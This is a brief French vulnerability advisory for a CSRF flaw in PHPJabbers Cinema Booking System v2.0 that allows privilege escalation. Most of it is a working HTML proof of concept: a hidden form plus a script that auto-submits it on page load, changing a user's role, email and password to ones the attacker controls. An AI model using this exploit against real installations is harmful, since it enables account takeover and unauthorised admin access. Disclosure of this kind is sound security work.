
CVE-2024-57429 : PHPJabbers Cinema Booking System v2.0 est vulnérable aux CSRF, permettant aux attaquants d'élever les privilèges en falsifiant des requêtes au nom d'un administrateur.
Une vulnérabilité de falsification de requête intersite (CSRF) dans la fonction pjActionUpdate de PHPJabbers Cinema Booking System v2.0 permet à des attaquants distants d'élever leurs privilèges en amenant un administrateur authentifié à soumettre une requête non autorisée.
L'exploitation de cette vulnérabilité CSRF peut entraîner des actions non autorisées, notamment :
<html>
<!-- CSRF PoC - Update Admin User -->
<body>
<form action="http://127.0.0.1/CinemaBookingDev/index.php?controller=pjAdminUsers&action=pjActionUpdate" method="POST">
<input type="hidden" name="user_update" value="1" />
<input type="hidden" name="id" value="3" />
<input type="hidden" name="role_id" value="1" />
<input type="hidden" name="email" value="[email protected]" />
<input type="hidden" name="password" value="newpassword123" />
<input type="hidden" name="name" value="Attacker" />
<input type="hidden" name="phone" value="1234567890" />
<input type="hidden" name="status" value="T" />
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>